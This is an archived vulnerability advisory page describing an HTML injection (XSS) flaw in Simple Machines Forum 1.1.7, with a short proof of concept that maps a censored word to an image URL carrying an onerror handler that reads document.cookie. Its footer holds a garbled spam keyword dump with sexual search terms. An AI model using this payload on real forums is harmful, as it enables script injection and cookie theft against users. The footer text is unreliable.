about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Simple Machines Forum Censored Words HTML Injection Vulnerability


Title Simple Machines Forum Censored Words HTML Injection Vulnerability
Published 2009-02-03-12:00AM
Updated 2009-02-03-12:00AM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Eduardo Vela
Vulnerable  Simple Machines SMF 1.1.7
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue.The following example is available:Add the following censored word:
http://www.test.xss/ => http://www.test-xss/" onerror="alert(document.cookie)and create a post with the following:
[img]http://www.test.xss/[/img]
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Mon, 07 Dec 2009 07:21:31 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
TAMIL SEX indai sex www.w9520. 200 /compo news/explo Linux 6. jxta system mec www.123cj. cnlovely.c WWW.MYFREN Microsoft t400t www wman s Mastimasal addguest.h 12forum pixel posr thrish sex lo425l www.xxx3x. free sex v Photos of News Searc Sexbebas CLE D ATIV wwrmw.com homeclips Www french 200 /compo p.../cache www.bluesk sexpictuer Dogf&a egg scar www.psku8. mambots/co 8lyg.cn crack data cutephp you tupe www.cable0 chinasexyg blog.jshuw hotbollywo Anarkali s www.dengzh 200 /compo bind 9.2.2